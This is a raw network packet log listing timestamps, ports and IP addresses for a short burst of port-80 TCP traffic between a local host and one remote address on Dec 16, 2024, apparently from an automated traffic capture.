Dec 16, 2024 11:03:22.860757113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.861772060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.861819983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.861825943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.861874104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.862968922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.863004923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.863018036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.863065004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.864018917 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.864069939 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.864145041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.864198923 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.865129948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.865178108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.865307093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.865401983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.866355896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.866410971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.866533995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.866580963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.867547035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.867603064 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.867671967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.867716074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.868598938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.868665934 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.868736982 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.868808985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.869750977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.869807959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.870008945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.870059013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.870982885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.871035099 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.871115923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.871166945 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.872085094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.872138023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.872309923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.872360945 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.873265028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.873332024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.873383999 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.873431921 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.874437094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.874473095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.874489069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.874516010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.875618935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.875674963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.875746965 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.875817060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.876679897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.876730919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.876813889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.876863003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.877871037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.877919912 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.877926111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.877981901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.879048109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.879097939 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.879180908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.879230022 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.880235910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.880270958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.880280018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.880321026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.881380081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.881428957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.013339996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.013432980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.013564110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.013844013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.013931036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.013945103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.014003038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.014843941 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.014892101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.014974117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.015024900 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.015974998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.016024113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.016081095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.016134024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.017085075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.017138004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.017188072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.017239094 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.018367052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.018416882 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.018424988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.018488884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.019417048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.019470930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.019556046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.019603014 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.020601034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.020654917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.020658016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.020703077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.021694899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.021747112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.021816015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.021866083 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.022895098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.022948027 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.022948027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.022998095 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.024003983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.024058104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.024171114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.024220943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.025198936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.025254965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.025388002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.025438070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.026410103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.026463985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.026612997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.026664972 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.027447939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.027503967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.027704000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.027755976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.028764009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.028801918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.028820038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.028846979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.029876947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.029913902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.029931068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.029963970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.031080961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.031116009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.031143904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.031162024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.032332897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.032398939 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.032466888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.032520056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.033238888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.033297062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.033478975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.033533096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.034423113 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.034481049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.034786940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.034848928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.035562992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.035626888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.035681009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.035732031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.036887884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.036945105 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.036979914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.037029028 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.037817001 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.037880898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.038009882 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.038069963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.039021015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.039092064 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.039129972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.039184093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.040160894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.040225029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.040282965 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.040338039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.041461945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.041496038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.041526079 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.041544914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.042572975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.042639017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.042685986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.042742968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.043617010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.043682098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.043720961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.043767929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.044761896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.044826984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.044895887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.044997931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.045913935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.045975924 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.046047926 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.046091080 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.047223091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.047257900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.047287941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.047306061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.048295021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.048360109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.048407078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.048459053 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.049427032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.049529076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.049535036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.049577951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.050586939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.050647974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.050690889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.050740004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.051749945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.051815987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.051862955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.051917076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.052897930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.052952051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.053020954 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.053066015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.054027081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.054078102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.054140091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.054184914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.055231094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.055286884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.055387020 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.055480003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.056427002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.056463003 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.056477070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.056505919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.057518005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.057565928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.057580948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.057626963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.058681011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.058743954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.058799982 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.058845043 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.059812069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.059859037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.060039997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.060086966 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.060981035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.061028957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.061263084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.061346054 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.062143087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.062192917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.062273026 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.062316895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.063299894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.063358068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.063412905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.063465118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.064435959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.064488888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.064618111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.064670086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.065694094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.065776110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.065800905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.065819025 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.066788912 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.066843987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.066847086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.066895008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.067905903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.067966938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.068097115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.068149090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.069062948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.069116116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.069240093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.069292068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.070207119 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.070255995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.070310116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.070360899 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.071372032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.071430922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.071471930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.071523905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.072503090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.072556973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.072679996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.072731018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.073684931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.073739052 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.205550909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.205671072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.205679893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.205718040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.205775976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.205823898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.205884933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.205935955 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.207257986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.207324982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.207338095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.207392931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.208183050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.208220959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.208236933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.208266973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.209321976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.209359884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.209393978 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.209410906 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.210468054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.210504055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.210525036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.210542917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.211558104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.211616993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.211683035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.211729050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.212774992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.212830067 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.212837934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.212884903 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.214698076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.214755058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.215022087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.215075970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.216547012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.216583014 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.216598988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.216620922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.216655970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.216667891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.216675043 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.216720104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.217720032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.217772961 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.217888117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.217937946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.218727112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.218782902 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.218893051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.218944073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.219815016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.219851971 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.219866991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.219903946 CET	49800	80	192.168.2.5	31.41.244.11
